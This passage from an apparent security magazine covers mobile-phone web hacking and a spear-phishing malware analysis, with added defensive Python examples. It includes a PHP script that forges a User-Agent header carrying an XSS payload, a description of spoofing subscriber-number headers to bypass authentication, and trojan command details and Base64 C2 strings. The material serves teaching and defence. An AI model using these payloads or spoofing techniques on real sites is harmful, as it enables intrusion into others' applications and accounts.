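  w = DnsSpoofWatcher.new
  w.on_query(41039, build_dns(0x9777, 'yahoo.com'))
  puts w.on_response(41039, build_dns(0x9777, 'yahoo.com', '192.0.2.10'))
  puts w.on_response(41039, build_dns(0x9777, 'yahoo.com', '198.51.100.7')), w.alerts
end
```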

It is indeed very easy to get started 
with PacketFu. Give it a try and you won't 
regret it, given its ease of use. 



Keith Lee 

You can reach me by the below means: 
Email: keith.lee2012[at]gmail.com 
Twitter: @keith55 

Blog: http://milo2012.wordpress.com 



MAURO GENTILE 

Difficulty 

WHAT YOU WILL LEARN... 

What mobile web means, 
How to structure a site accessible from mobile devices, 
How to use a phone as a tool for hacking. 

WHAT SHOULD YOU KNOW... 

PHP and JavaScript programming languages, 
Client-server communication protocol. 

Mobile Web: Privacy Keeping and Exploitation Methods 



Modern technology has produced a rapid spread of so-called 
mobile devices (i.e. mobile phones and handhelds) with which the 
use of the Internet and its services has become very easy and 
affordable. 

Nevertheless, the approach to hacking 
begins to depart slightly from the classic 
approach that requires a computer or 
a laptop with which to connect to the network, 
because several attack scenarios can be carried out 
from your phone. 

Introduction 

Inevitably, most readers will think that the 
purpose of this article is to present arguments 
regarding vulnerabilities related to the protocols 
for Bluetooth, or even how to intercept telephone 
calls. In fact, this article takes an entirely different 
approach. The main objective is to highlight 
the opportunity to use our phone as a terminal 
to connect to the network and find possible 
vulnerabilities of web applications by putting 
in place some mini attacks wherever we are. 
Of course, what is expressed here may be very 
trivial and unnecessary for some hackers. It 
appears paradoxical and probably foolish to 
attempt hacking from a phone, but in any case, 
why not try? 

The testing of all that will be explained has 
been done on a Nokia N70 V 5.0609.2.0.1 on 
which I have installed the browser Opera Mini 
v. 4.2.13918. The default browser needs the 
functionality discussed later in this article. 

Technical Limitations 

From a purely technical point of view, we must 
forget the possibility of some highly 
advanced and sophisticated attacks, due to the brutal 
restrictions that you have when using a mobile 
phone. Moreover, a shell is not available (on 
normal devices) and the browser does not 
provide specific extensions that are sometimes 
extremely important during the auditing and 
exploitation of a web app. Moreover, the inability 
to manage multiple browsing sessions 
simultaneously causes a significant slowdown in 
the analysis phase. 

Mobile Web: The Meaning 

The Mobile Web is an opportunity to take 
advantage of many online services directly from 
a mobile device. Unlike a normal computer, a 
cell phone has a unique mechanism by which the user 
interfaces with it. Just consider that the use of 
both hands (essential in the case of a keyboard) 
is reduced to two individual fingers (the thumbs of 
both hands). Furthermore, any position we take 
during the Internet session does not affect the 
ability to continue to navigate safely, something 
unthinkable in the case of a PC. I read long ago 
on the Opera Mini developers' blog a memorable 
phrase by Brian Suda: in essence, the mobile 
device is truly an extension of you and not vice 
versa. 

In fact, the use of mobile web browsing 
is reduced to repetitive motions while looking 
for news or updates, which has discouraged and 
demoralized the majority of web programmers. 
Realize, however, that, at least in Italy, navigating 
through your phone is not a common 
practice. I do not think that mobile 
operators are ready to offer attractive 
fares and genuinely adequate 
coverage. The arrival of the iPhone has 
spread this practice widely and anyone 
with this device cannot stay without the 
mobile web. 



Mobile Phones Detection 

The ability to detect whether a user is 
visiting our site from a mobile device, or 
simply from a laptop, is very important 
for web programmers. This 
makes it possible to implement a trivial 
service differentiation, i.e. the page 
displayed as output in response to the request for a 
site is different depending on the device 
from which we carry out the request. 
There are many PHP classes that allow 
such a possibility and they are often 
based on a few lines of code (see 
Listing 1). 

The possibility of offering services 
ad hoc on the basis of the device from 


Listing 1. mobiledet.PHP 

<?php 

function mobile_detection() { 
    // WAP profile / UA-pixels headers are only sent by mobile browsers 
    if (isset($_SERVER['HTTP_X_WAP_PROFILE']) || isset($_SERVER['HTTP_PROFILE']) || isset($_SERVER['UA-pixels'])) { 
        return true; 
    } 

    // first four characters of known mobile user-agent strings 
    $arr = array( 
        'alca' => 'alca', 
        'amoi' => 'amoi', 
        'benq' => 'benq', 
        'ipaq' => 'ipaq', 
        'java' => 'java', 
        'midp' => 'midp', 
        // 
        'winw' => 'winw', 
    ); 

    if (isset($arr[substr($_SERVER['HTTP_USER_AGENT'], 0, 4)])) { 
        return true; 
    } 
    return false; 
} 

?> 

Listing 2. telprot.PHP 

<?php 

require_once('wurfl_config.php'); 
require_once(WURFL_CLASS_FILE); 
// 

$myDevice = new wurfl_class($wurfl, $wurfl_agents); 

$myDevice->GetDeviceCapabilitiesFromAgent($_SERVER["HTTP_USER_AGENT"]); 
if ($myDevice->getDeviceCapability('wml_make_phone_call_string')) { 
    echo '<a href="' . $myDevice->getDeviceCapability('wml_make_phone_call_string') . '0000000000">call me at 0000000000</a>' . "\n"; 
} else { 
    echo 'My telephone number is 0000000000' . "\n"; 
} 

?> 



Listing 3. iswap.PHP 

<?php 

$device = new wurfl_class($_SERVER["HTTP_USER_AGENT"]); 
if ($device->browser_is_wap) { 
    header("Content-Type: text/vnd.wap.wml"); 
    echo '<?xml version="1.0" encoding="ISO-8859-1"?>' . "\n"; 
?> 

// wml code ... 
<?php 
} else { 
?> 

Sorry friend, we offer only WAP services.<hr> 
<?php } ?> 
which the request starts coincides with the 
capacity of the server to test the potential 
of the device. This practice is quite 
logical because it reduces the amount 
of data downloaded and thus leads to 
less spending (most mobile operators' 
charges are based on the bytes exchanged 
while navigating). 

It is usual to work in this direction by 
focusing on the output received from 
$_SERVER['HTTP_USER_AGENT'], that 
is, the browser string used by the user. 

Nonetheless, a new device with a 
screen resolution not recognized by 
the server could access our site, so 
the latter would not be able to react and 
provide a proper output. Hence arise 
the various issues and discussions 
about how to proceed 
in the design and planning of mobile 


Table 1. OperaMini request headers 

Http-header             Output 
X-OperaMini-Features    <feature> *[ , <feature> ] 
X-OperaMini-Phone-UA    <user-agent> 
X-OperaMini-Phone       <manufacturer> # <model> 



Listing 4. form.html 

<form action="socket.PHP" method="post"> 

<input type="text" name="URL" value="Insert URL :) (for example /URL.PHP)"> 

<input type="submit" value="Send"> 

</form> 



Listing 5. socket.PHP 

<?php 

$host = "localhost"; 
$target = $_POST['URL']; 
$port = 80; 
$timeout = 60; 
$protocol = "HTTP/1.0"; 
$br = "\r\n"; 

$sk = fsockopen($host, $port, $errnum, $errstr, $timeout); 

if (!is_resource($sk)) { 
    exit("Failed connection: " . $errnum . " " . $errstr); 
} else { 
    // faked http-headers :P 
    $headers = "GET " . $target . " " . $protocol . $br; 
    $headers .= "Accept: image/gif, image/x-xbitmap, image/jpeg" . $br; 
    $headers .= "Accept-Language: boh" . $br; 
    $headers .= "Host: " . $host . $br; 
    $headers .= "Connection: Keep-Alive" . $br; 
    $headers .= "User-Agent: <script>alert('XSS =)')</script>" . $br; 
    $headers .= "Referer: http://www.***.it" . $br . $br; 
    fputs($sk, $headers); 

    // read the whole response and echo it back to the browser 
    $dati = ""; 
    while (!feof($sk)) { 
        $dati .= fgets($sk, 2048); 
    } 
    fclose($sk); 
    echo $dati; 
} 

?> 


websites. Indeed it is usual in such 
cases to employ this device as a new 
phone and possibly point out the visit to 
the programmer. 

Wurfl & co. 

Wurfl is an extremely efficient library composed of a database of the characteristics of all mobile devices in circulation. When a mobile device visits a site, you can determine its capabilities by looking them up in the wurfl database. The basic idea is then to design and implement a basic site and gradually enrich it according to the characteristics of the device.

The syntax for using the library is not complex and requires little knowledge of PHP (hypertext preprocessor) or other programming languages. The classic example of using this library is detecting the screen resolution of the mobile devices that visit our site. Moreover, it is usual to check whether the phone supports the tel: protocol, i.e. whether it can make calls directly from the browser (see Listing 2).

Equally important is the possibility of making certain pages of a site visible only to browsers capable of interpreting the wireless markup language (WML), so we can exclude all visitors (connected from a computer) who wish to display pages optimized for mobile devices (see Listing 3).

This emphasizes the need to rely on Wurfl when designing a large website for mobile devices: its efficiency is not comparable to that of a home-made PHP class.

40 HAKIN9 2/2010

MOBILE WEB: PRIVACY KEEPING AND EXPLOITATION METHODS

Opera Mini Browser

The browser is the key while browsing the web. I believe it is essential to devote a paragraph to Opera Mini, even considering the closed standards of the Opera corporation (we prefer open source). This browser is, in my opinion, the best in circulation for mobile devices. It is able to run on any device with a JVM (Java Virtual Machine); however, the benefits differ depending on the hardware of your device. The request for a website crosses Opera's servers, which minimize the bytes used and make the content accessible by mobile phone.

From a technical standpoint, Opera Mini uses certain unregistered HTTP headers, such as X-OperaMini-Features, X-OperaMini-Phone-UA and X-OperaMini-Phone (Table 1), which, at the end of this discussion, can be used with lawful or unlawful intent.
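The three Table 1 headers have a simple grammar, so here is an added Python parser for them (example code, not the article's own); the header dictionary is a constructed sample, and since the values are chosen by the client they are only fit for content negotiation, never for identification.

```python
"""Parser for the Opera Mini request headers of Table 1.

Added example, not code from the article. The grammar follows Table 1:
  X-OperaMini-Features: <feature> *[ , <feature> ]
  X-OperaMini-Phone-UA: <user-agent>
  X-OperaMini-Phone:    <manufacturer> # <model>
Like every request header, these values are chosen by the client, so the
result is suitable for content negotiation, never for authentication.
"""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple


@dataclass(frozen=True)
class OperaMiniInfo:
    features: Tuple[str, ...]
    phone_ua: Optional[str]
    manufacturer: Optional[str]
    model: Optional[str]

    @property
    def via_opera_mini(self) -> bool:
        """True when at least one X-OperaMini-* header was present."""
        return bool(self.features or self.phone_ua or self.manufacturer)


def _header(headers: Dict[str, str], name: str) -> Optional[str]:
    """Case-insensitive lookup; a blank value counts as absent."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value.strip() or None
    return None


def parse_opera_mini(headers: Dict[str, str]) -> OperaMiniInfo:
    """Extract the Table 1 fields from a request header dictionary.

    Missing or malformed headers give None / an empty tuple instead of
    raising: most mobile requests carry none of these headers at all.
    """
    raw = _header(headers, "X-OperaMini-Features")
    features = tuple(f.strip() for f in raw.split(",") if f.strip()) if raw else ()

    manufacturer = model = None
    phone = _header(headers, "X-OperaMini-Phone")
    if phone:
        # "<manufacturer> # <model>": split on the first '#' only, so a
        # model string that itself contains '#' stays intact.
        left, sep, right = phone.partition("#")
        manufacturer = left.strip() or None
        if sep:
            model = right.strip() or None

    return OperaMiniInfo(features, _header(headers, "X-OperaMini-Phone-UA"),
                         manufacturer, model)


# Constructed sample request (not a real capture): a phone browsing
# through Opera Mini, with the three Table 1 headers present.
SAMPLE_HEADERS = {
    "User-Agent": "Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.13337/504; U; en)",
    "X-OperaMini-Features": "advanced, camera, file_system, secure",
    "X-OperaMini-Phone-UA": "Nokia6300/2.0 (05.00) Profile/MIDP-2.0",
    "X-OperaMini-Phone": "Nokia # 6300",
}

if __name__ == "__main__":
    info = parse_opera_mini(SAMPLE_HEADERS)
    print(info.via_opera_mini, info.manufacturer, info.model, info.features)
```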

Approach to Classical Attack Methods

We can continue the discussion focusing on the known vulnerabilities of Cross Site Scripting, or XSS, i.e. the possibility of injecting malicious code within web pages. This scenario is usually caused by a lack of precautions by programmers during input validation (see Figure 1).

In the case of mobile devices, the ability to identify and possibly exploit vulnerabilities is the same as if we had a computer.

There is a similar situation in the case of vulnerabilities like RFI or LFI, namely Remote / Local File Inclusion. In such cases it is still complex to experience the security flaw, because it is closely related to the possibility of keeping an eye on the URL of the page you are visiting, which is sometimes hidden by mobile browsers.

Playing with PHP Socket 

So far we have discussed everything from a purely theoretical point of view, so let's gain some practical insight. First we can try to write PHP code to generate some minimalistic pages, so as to avoid spending lots of money during our web sessions.

As many readers will know, the communication between a client and a server happens by sending http-headers, that is information regarding the request made to the server, the browser we use, etc. The headers are generated by the browser itself, so it is possible to modify that information ad hoc in order to inject malicious code into the log pages, which will occasionally be checked by a user with special permissions (the administrator). Eventually this practice will coincide with the execution of the code we entered. This is usually carried out from ordinary browsers (not mobile browsers) by installing the appropriate extensions (for example, Modify Headers or Live HTTP Headers for Firefox).

Of course, it is conceivable to implement a similar attack from our mobile device through a few lines of PHP code, in particular through the fsockopen function, which is able to open a connection to a socket belonging to an Internet domain.

Imagine you have a page form.html (see Listing 4) through which you can enter the URL of the page to which we wish to connect, and a script socket.php (see Listing 5).

Extracts of the code just transcribed allow you to change your http-headers by quietly changing the parameters in socket.php, so it becomes extremely easy to use that page from your mobile device and change the http headers without any extension installed in your browser! Actually, establishing a connection using the PHP function just mentioned (fsockopen) implies a very significant cost in terms of time (let's not forget that cost analysis is essential for software engineers).

Figures 2 and 3 show a situation very similar to what we just explained: we connected to a page whose output is the faked user-agent, with XSS feedback.
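The attack above works only when the log viewer writes header values into the page unescaped, so here is an added Python example (not the article's code) of the defender's side: combined-format log lines (constructed, in Apache's combined format) are parsed, User-Agent and Referer values containing markup are flagged, and the log page is rendered with every value HTML-escaped.

```python
"""Rendering request headers in a log viewer without reflecting markup.

Added example, not code from the article. The article shows a User-Agent
carrying <script> markup that runs when an administrator opens a log
page. The defender's side has two parts:
  1. header values are untrusted input and are HTML-escaped before they
     are rendered;
  2. header values containing markup or CR/LF are flagged for review.
The log lines below are constructed, in Apache "combined" format.
"""
import html
import re
from typing import Dict, List, Optional, Tuple

# Apache combined format:
#   host ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Things that have no business in a User-Agent or Referer value: a tag
# opener, a javascript: URL, or a bare CR/LF (header injection attempt).
MARKUP_RE = re.compile(r"<[a-zA-Z/!]|javascript:|[\r\n]", re.IGNORECASE)

FIELDS = ("host", "time", "request", "status", "referer", "agent")


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; None when it does not match."""
    m = COMBINED_RE.match(line.rstrip("\r\n"))
    return m.groupdict() if m else None


def suspicious_headers(entries: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """(host, field, value) for every Referer/User-Agent that looks like markup."""
    hits = []
    for e in entries:
        for field in ("referer", "agent"):
            if MARKUP_RE.search(e[field]):
                hits.append((e["host"], field, e[field]))
    return hits


def render_log_html(entries: List[Dict[str, str]]) -> str:
    """Render entries as an HTML table, escaping every untrusted value.

    html.escape(quote=True) converts <, >, &, " and ' to entities, so a
    User-Agent of <script>alert('XSS =)')</script> is shown as text
    instead of being executed by the viewer's browser.
    """
    rows = []
    for e in entries:
        cells = "".join("<td>%s</td>" % html.escape(e[k], quote=True) for k in FIELDS)
        rows.append("<tr>%s</tr>" % cells)
    return "<table>\n%s\n</table>" % "\n".join(rows)


def analyse(log_text: str):
    """Parse a log, list the suspicious entries and build the safe page."""
    entries = [e for e in map(parse_combined, log_text.splitlines()) if e]
    return entries, suspicious_headers(entries), render_log_html(entries)


# Constructed log: an ordinary Opera Mini visit, then a request whose
# User-Agent carries the article's XSS probe (single quotes, as in Listing 5).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2010:10:01:02 +0100] "GET /index.php HTTP/1.1" 200 512 "-" "Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.13337/504; U; en)"
10.0.0.9 - - [12/Jan/2010:10:02:17 +0100] "GET /URL.php HTTP/1.0" 200 318 "http://www.example.invalid/" "<script>alert('XSS =)')</script>"
"""

if __name__ == "__main__":
    _, hits, page = analyse(SAMPLE_LOG)
    for host, field, value in hits:
        print("suspicious %s from %s: %r" % (field, host, value))
    print(page)
```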

"X headers" and Funny Spoofing

Some names of particular http-headers begin with 'X'. They are not standard fields at all; they are used to receive a different output based on settings that characterize our mobile device. A list of the most used X headers is available at http://mobiforge.com/developing/blog/useful-x-headers.

Of course, we must emphasize that the device from which we conduct the test sends different headers depending on the browser we use and even on the phone company. In fact, some mobile operators assign an id to every single SIM card, which is sent in an X-header field. This mechanism is very important because it implies the possibility of authenticating (or recognizing) a user visiting a site. In practical terms, it is sufficient to use an if-else statement to check whether the id associated with the visitor of our web page is in our database. If the outcome of the check is positive, it is possible to proceed with user authentication (the visitor will be able to enter reserved areas). Hence the time required to log in disappears!

Figure 1. A mobile XSS

Figure 2. form.html from my Nokia N70 (Opera Mini)

Figure 3. Faked user-agent with fsockopen and output (XSS)

Listing 6. re/num.php

<?php
// these operator headers are absent in most requests (see text), and they
// are client-supplied, so they are escaped before being echoed into the page
echo "Your telephone number is: " . htmlspecialchars($_SERVER["HTTP_X_UP_SUBNO"]) . "<br>";
echo "x-wap-profile: " . htmlspecialchars($_SERVER['HTTP_X_WAP_PROFILE']) . "<br>";
echo "user-agent: " . htmlspecialchars($_SERVER['HTTP_USER_AGENT']) . "<br>";
?>

Listing 7. exoticauthentication.php

<?php
// isRegistered() is assumed to look the subscriber id up in our database
$num = $_SERVER["HTTP_X_UP_SUBNO"];

if (isset($num) && isRegistered($num))
    echo "Access granted...";
else
    echo "Access denied...";
?>

Figure 4. Links2 on my Openmoko NeoFreerunner (with Debian)

Nevertheless, the scenario mentioned above can lead to a whole range of privacy issues. When authentication occurs on the basis of a value on our SIM card, privacy is violated dramatically. The theft of our mobile device can give an attacker access to the strictly private areas and information that we reserve online.

The code in Listing 6 brings to light the possibility for a web programmer to retrieve the phone number of all visitors. I want to emphasize that these kinds of headers are empty in most cases!

The possibility of spoofing the phone number by modifying headers with the technique mentioned previously (fsockopen) creates a very relevant vulnerability; fortunately this type of authentication is almost absent, and this article highly discourages it.

We can also present an example of an exotic authentication (I think it is not currently used at all). In Listing 7 there is a blind vulnerability which paves the way for a lot of privacy problems if the phone number is spoofed.
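To make the point of Listing 7 concrete, here is an added Python model (not the article's code) of that check beside a hardened one in which the X-header is only a hint and the credential is a server-issued, HMAC-bound session token; the subscriber ids, the key and the request dictionaries are constructed, and "request" stands in for PHP's $_SERVER plus the session cookie.

```python
"""Why a subscriber id in an X-header is not a credential.

Added example, not code from the article. It models Listing 7 (access
granted when HTTP_X_UP_SUBNO is in our database) and a hardened variant in
which the header is only a hint: access needs a server-issued session
token, created after a real login and bound to the subscriber id with an
HMAC. Subscriber numbers, the key and the request dictionaries are all
constructed; "request" stands for PHP's $_SERVER plus the session cookie.
"""
import hashlib
import hmac
from typing import Dict

# Constructed registered subscriber ids (the role of isRegistered() in Listing 7).
REGISTERED = {"39333000001", "39333000002"}

# Constructed server secret; a real deployment keeps this outside the code.
SESSION_KEY = b"constructed-demo-key-do-not-use"


def is_registered(subno: str) -> bool:
    return subno in REGISTERED


def listing7_check(request: Dict[str, str]) -> bool:
    """Listing 7 as written: whoever sends a registered id gets in."""
    num = request.get("HTTP_X_UP_SUBNO")
    return num is not None and is_registered(num)


def _tag(subno: str) -> str:
    return hmac.new(SESSION_KEY, subno.encode(), hashlib.sha256).hexdigest()


def issue_session(subno: str) -> str:
    """Token handed out only after a genuine login (password, OTP, ...).

    Format "<subno>.<hmac-sha256(subno)>": readable, but nobody without
    SESSION_KEY can mint a token for another subscriber.
    """
    return "%s.%s" % (subno, _tag(subno))


def hardened_check(request: Dict[str, str]) -> bool:
    """The session token is the credential; the header may only confirm it.

    Denies when the token is missing or tampered with, when the subscriber
    is not registered, or when the operator header names someone else.
    """
    token = request.get("SESSION_COOKIE", "")
    subno, sep, tag = token.rpartition(".")
    if not sep or not hmac.compare_digest(tag, _tag(subno)):
        return False
    header_subno = request.get("HTTP_X_UP_SUBNO")
    if header_subno is not None and header_subno != subno:
        return False
    return is_registered(subno)


def scenarios() -> Dict[str, bool]:
    """The same constructed requests run through both checks."""
    forged = {"HTTP_X_UP_SUBNO": "39333000001"}      # header set by the client itself
    good = {"HTTP_X_UP_SUBNO": "39333000001",
            "SESSION_COOKIE": issue_session("39333000001")}
    mismatch = dict(good, HTTP_X_UP_SUBNO="39333000002")
    tok = good["SESSION_COOKIE"]
    tampered = dict(good, SESSION_COOKIE=tok[:-1] + ("0" if tok[-1] != "0" else "1"))
    stranger = {"SESSION_COOKIE": issue_session("39333009999")}  # valid tag, unknown id
    return {
        "listing7_forged": listing7_check(forged),      # True: the header alone suffices
        "hardened_forged": hardened_check(forged),      # False: no session token
        "hardened_good": hardened_check(good),          # True
        "hardened_mismatch": hardened_check(mismatch),  # False: header disagrees
        "hardened_tampered": hardened_check(tampered),  # False: bad HMAC
        "hardened_stranger": hardened_check(stranger),  # False: not registered
    }


if __name__ == "__main__":
    for name, outcome in scenarios().items():
        print("%-18s %s" % (name, "granted" if outcome else "denied"))
```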

Mobile Web Testing 

Testing a mobile website is fundamental to understanding vulnerabilities and fixing them. It is, however, awkward and complex to test a mobile web page from a mobile device because of the limitations mentioned. It is possible to test in peace from your computer through the browser that we use for our daily browsing sessions. Opera provides the opportunity to visit sites written in WML.

Even with Firefox you can test from your computer, emulating the behavior of a mobile device connected to the Internet.

This is achieved by installing an extension, Modify Headers, through which you can change the http-headers sent to the server. Changing the user-agent header and adding the x-wap-profile header allows you to receive an output similar to what would happen if we were visiting the site from our phones.

It is also possible to use a variety of online emulators. Testing from the computer, as shown in this section, also saves money (and time!). You can find other important information here: http://mobiforge.com/testing/story/testing-mobile-web-sites-using-firefox.

Unconventional Mobile Device: NeoFreerunner

To quote the opinion of the Openmoko wiki: The Neo FreeRunner is a Linux-based touch screen smart phone ultimately aimed at general consumer use as well as Linux desktop users and software developers. In practice, we can have a Linux environment wherever we are. The NeoFreerunner (gta02), while still unripe and considerably young, is a mobile platform with large potential. There is an infinite number of distros to install and many applications.

In this case, the discourse moves away from the examples presented so far, as the gta02 is close to being a mini laptop; when installing Debian, Gentoo or Arch, the ability to analyze a mobile website changes dramatically. This stems from the fact that you have access to many applications that we normally use on our computer (see Figure 4).

Still on the subject, NeoPwn is a pen-test oriented distro. It is based on Debian and reminiscent of BackTrack. We don't want to continue the discussion in this direction because it would be considerably off track; just think that it is possible to hack a WEP / WPA network with a NeoFreerunner ... (see also Figure 5).

Conclusions 

We have presented some scenarios in good detail, but the fact remains that anyone who wants to start hacking from their mobile device must continue to inquire about it. I hope that with the release of new mobile devices, the human-machine interaction becomes ever simpler and therefore the ability to analyze a mobile website becomes affordable for many. Sorry for my bad English.
http://mobiforge.com/developing/blog/useful-x-headers - a list of useful x-headers,
http://www.opera.com/mini/ - Opera Mini browser,
http://dev.opera.com/articles/mobile/ - good articles by Dev.Opera,
http://www.php.net/fsockopen - fsockopen PHP function,
http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html#sec14.43 - User-Agent http-header.
Figure 5. Midori on my Openmoko NeoFreerunner (with Debian)

WHAT YOU WILL LEARN...

How to rapidly examine and triage a real-world malware threat from an intrusion

How to perform basic reverse engineering

WHAT SHOULD YOU KNOW...

Basic malware handling

Basic x86 assembly



Intelligence Report: Analysis of a Spear Phishing Attack

A spear phishing attack occurs when an attacker sends targeted emails tailored to a specific user or organization. The execution of the attack can vary by the underlying goals of the attacker.

In some cases, the goal may be to gain information from the user. In other cases, the objective may be to gain access to target networks. Generally, the attack is conducted by convincing the user either to download and run a malicious attachment or to interact with the adversaries.

This report analyses a detected spear phishing attack, and the actions that were taken to investigate the techniques used and the origin of the attack. In this incident, a spear phishing attack was blocked and actions were taken to study the technical aspects of the attack. This report will examine the mechanisms used to deliver the attack, review the disassembly of the tools, and the features that enabled defenders to effectively mitigate the attack.

Numerous methods were employed during the investigation of this attack. First, we utilized static analysis to examine all files. Tools such as IDA Pro, Radare, and Hiew were used to review binaries. We also examined the malware at run time utilizing virtual machines and dynamic analysis tools such as Immunity Debugger, Python, and Fiddler. Executables were also modified to enable a simulated C&C (command and control) to interact with the executables being observed inside the virtual machine. Finally, basic network reconnaissance was performed to monitor systems managed by the attacker.

As with any spear phishing attack, there was an enticing social engineering element compounded with some low-tech tactics that would drop a trojan and then poll a website for commands. After a period of time, the adversary updated the site with a download command, which in turn was used to make the trojan retrieve the backdoor. The backdoor is a minimal command shell that gives the attacker OS level access to the host and consequently the target's network. The remainder of this paper will discuss the response to the attack and the subsequent analysis of the retrieved components.
Figure 1. CHM file call to the embedded executable, svchost.exe

ANALYSIS OF A SPEAR PHISHING ATTACK



The Staged Attack: Functional Analysis

In this section, the primary components of the spear phishing attack are broken down and discussed in detail. The first subsection looks at the first phase, in which the attacker sends the email with a malicious attachment. The attachment drops a trojan that then polls a controller site. To initiate the next phase of the attack, the malware is directed to download a backdoor. In the following subsection, the functionality and characteristics of the retrieved backdoor are discussed.

The Primary and Secondary Payloads

The first stage of any successful spear phishing attack requires a believable social engineering email. The social engineering email manipulates the target in an effort to earn trust or pique curiosity. The manipulation may involve using false or true information along with personal information to make the target believe the adversary knows them. Once the target trusts the attacker, the attacker can advance the scenario. Due to privacy concerns in this case, access to the spear phishing email was not granted, but the attachment contained in the malicious email was made available.

The campaign for this case used a malicious attachment that contained a trojan. The attacker extensively profiled the targets and the organization they were in before sending the phishing bait. The bait contained a very convincing story for opening the attachment. When the malicious attachment is viewed, it starts a trojan in the background on the target's computer. The malicious attachment used in this attack campaign is in Microsoft's Compiled HTML Help file (CHM) format, which drops and starts the malware process, svchost.exe, shown in Figure 3.

Figure 1 shows the section of the CHM responsible for dropping and starting the executable in the background on the victim's machine. The CHM file itself uses content linked from genuine open source material that is domain specific to the target. The content seen in this case includes information from a legitimate web site, as well as references to the Federal Reserve Board (FRB) Conference on Key Developments in Monetary Economics.

Figure 2. Registry key where the malware is installed

Figure 3 detail (process properties): Path: C:\WINDOWS\Downloaded Program Files\svchost.exe; Command line: "C:\WINDOWS\Downloaded Program Files\svchost.exe"; Current directory: C:\Documents and Settings\Administrator\Desktop\; Parent: hh.exe(3128); User: APRIDGEN-E8FBA8\Administrator; Started: 11:26:51 AM 6/22/2009

Once the executable starts, it sets a Microsoft Windows Registry key that will run the trojan automatically upon start-up. Figure 2 shows the registry key and the registry location where the key is installed. The key is a known startup key, but not one of the most commonly used. After setting the registry key, the binary then polls a hard coded host and URI, which will send commands in the comments of the web page. The command embedded in the page is Base64 encoded and surrounded by <!-- ... --!> tags. Static analysis of the trojan showed a limited set of known commands. These included:

sleep
download
connect
cmd
quit
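The command channel just described (a Base64 string inside <!-- ... --!> comment tags, drawn from a five-word command set) is easy to check for in fetched pages or proxy captures; the following is an added Python scanner (not the report's own code) that extracts every HTML comment, decodes it strictly as Base64 and reports the ones that decode to a known command. The page it runs over is constructed, with placeholder host and path.

```python
"""Find and decode Base64 commands hidden in HTML comments.

Added example, not code from the report. The trojan described above
reads its command from a Base64 string wrapped in <!-- ... --!> comment
tags and knows only sleep, download, connect, cmd and quit. This scanner
pulls every HTML comment out of a page, tries a strict Base64 decode, and
reports the ones that decode to a known command. The sample page is
constructed; its host and path are placeholders.
"""
import base64
import binascii
import re
from typing import List, NamedTuple, Optional

KNOWN_COMMANDS = {"sleep", "download", "connect", "cmd", "quit"}

# The trojan's closing tag is "--!>", which is not standard HTML; accept
# both that and the regular "-->".
COMMENT_RE = re.compile(r"<!--(.*?)--!?>", re.DOTALL)
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


class C2Command(NamedTuple):
    raw: str          # the Base64 text as found in the page
    command: str      # decoded command word
    args: List[str]   # remaining whitespace-separated tokens
    offset: int       # where the comment starts in the page


def decode_b64(token: str) -> Optional[str]:
    """Strict Base64 decode to ASCII text; None if it is not Base64.

    Missing '=' padding is tolerated; anything outside the Base64
    alphabet, or that does not decode to ASCII, is rejected.
    """
    if not B64_RE.match(token):
        return None
    padded = token + "=" * (-len(token) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None


def find_c2_commands(page: str) -> List[C2Command]:
    """Return every HTML comment in the page that decodes to a known command."""
    found = []
    for m in COMMENT_RE.finditer(page):
        body = m.group(1).strip()
        text = decode_b64(body)
        if text is None:
            continue
        parts = text.split()
        if parts and parts[0].lower() in KNOWN_COMMANDS:
            found.append(C2Command(body, parts[0].lower(), parts[1:], m.start()))
    return found


def _b64(text: str) -> str:
    return base64.b64encode(text.encode()).decode()


# Constructed page (not a real capture): an ordinary template comment, a
# Base64 "sleep 600" ahead of <html> as in the polled page, and a download
# command further down. c2.example.invalid and /update.exe are placeholders.
SAMPLE_PAGE = (
    "<!-- site template v3 -->\n"
    "<!--" + _b64("sleep 600") + "--!>\n"
    "<html><head><title>Login</title></head><body>\n"
    "<p>Welcome</p>\n"
    "<!--" + _b64("download c2.example.invalid /update.exe") + "--!>\n"
    "</body></html>\n"
)

if __name__ == "__main__":
    for c in find_c2_commands(SAMPLE_PAGE):
        print("offset %d: %s %s  (%s)" % (c.offset, c.command, " ".join(c.args), c.raw))
```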
Figure 3. Trojan started by CHM file

Figure 4. HTTP HEAD command performed on all the servers (terminal output of HEAD requests to the three servers; each answered HTTP/1.1 200 OK with Server: Microsoft-IIS/6.0 and X-Powered-By: ASP.NET)
During run time analysis, only the sleep and download commands were observed to be used by the attacker. The sleep command forces the dropper to sleep for a period of time, based on a parameter passed to the function. The live analysis showed that the attacker's page would make the trojan po ll every 10 minutes. The download command downloads and executes a binary specified by the attacker. This command accepts a host or FQDN (fully qualified domain name) and then a URL. It uses the WinHTTP library to establish network connections. After approximately 8 hours, the attacker's page was updated with this command, and the trojan would have received the location of the new binary to execute. A script was used in place of the trojan to poll and monitor the site, and once the command was received, the script downloaded the binary from the site. After retrieving the binary, it was analyzed and found to be a back door. The next sub-section will detail the functionality of this binary.

Figure 5. Dumped CHM files (CHM internal files such as #IDXHDR, #STRINGS, #SYSTEM, #TOPICS, #URLSTR, #URLTBL, #WINDOWS, $OBJINST, $WWAssociativeLinks and $WWKeywordLinks, plus newproject.hhk, svchost.exe and FRB_Conference on Key Developments in Monetary Economic.htm)

Figure 6. strings output with Base64 decoded strings via Python (strings of interest: GetModuleHandleA, login.html, c2xlZXA=, Y21k, cXVpdA==, +windows+NT+5.1, .exe, HTTP/1.1, %s %s, --!>, <!--, Update, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run)

$ python
Python 2.6.2 (release26-maint, Apr 19 2009, 01:58:18)
[GCC 4.3.3] on linux2
